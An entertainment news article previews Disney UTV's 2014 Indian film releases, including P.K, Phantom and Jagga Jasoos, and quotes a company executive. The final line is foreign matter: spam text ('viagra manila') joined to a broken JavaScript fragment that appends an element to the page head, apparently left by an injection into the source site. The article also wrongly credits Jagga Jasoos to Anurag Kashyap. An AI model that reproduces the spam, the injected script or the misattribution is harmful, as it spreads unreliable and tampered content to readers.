Disney UTV has 14 really interesting releases this year!

Disney UTV, which had a mighty successful 2013 with a lot of big and interesting releases in its banner like Chennai Express, Yeh Jawani Hain Deewani, Race 2, ABCD, Kai Po Che, Ship Of Theseues, Lunch box and Shahid has nearly 14 releases that are lined up for release this year and the projects that were chosen by Disney UTV got a lot more interesting this year.

Phantom, Haider, P.K, Highway, 2 States, Jagga Jasoos are some of them. The biggest project is undoubtedly P.K which will have the combination of Aamir Khan and Rajkumar Hirani, a combination that broke records in the past, with 3 Idiots. Unlike last year where Disney UTV had Shah Rukh Khan’s Chennai Express, this year, they won’t be producing a film with Shah Rukh Khan as they will then have to pay loads of money if they’d like to take up the production of Happy New Year.

Saif Ali Khan and Katrina Kaif starrer Phantom is one other film that Disney UTV can get successful once again with as the movie is being directed by Kabir Khan of Ek Tha Tiger. Anurag Kashyap’s Jagga Jasoos is one more project that could bring them huge success, knowing how Ranbir and Anurag’s Barfi has done a great job in the past.

Not just in Hindi, Disney UTV has some really big projects lined up in Tamil and Telugu as well, with a Suriya film in Tamil and a Mahesh Babu film in Telugu.

Amrita Pandey the VP of Disney UTV India talks about the films that they have lined up in 2014 saying, “Disney UTV has produced some of the most trendsetting and cult movies of the past decade and we are confident that our upcoming releases will keep the same tradition alive. Our foremost effort is to ensure that we bring our audiences great stories that are original, innovative and delivered by the best talent in the business. We are delighted to associate with some of the most talented names in the industry – established names and debutants – to deliver a slate of movies that will entertain audiences of all ages and tastes.” viagra manila d.getElementsByTagName(‘head’)[0].appendChild(s);}
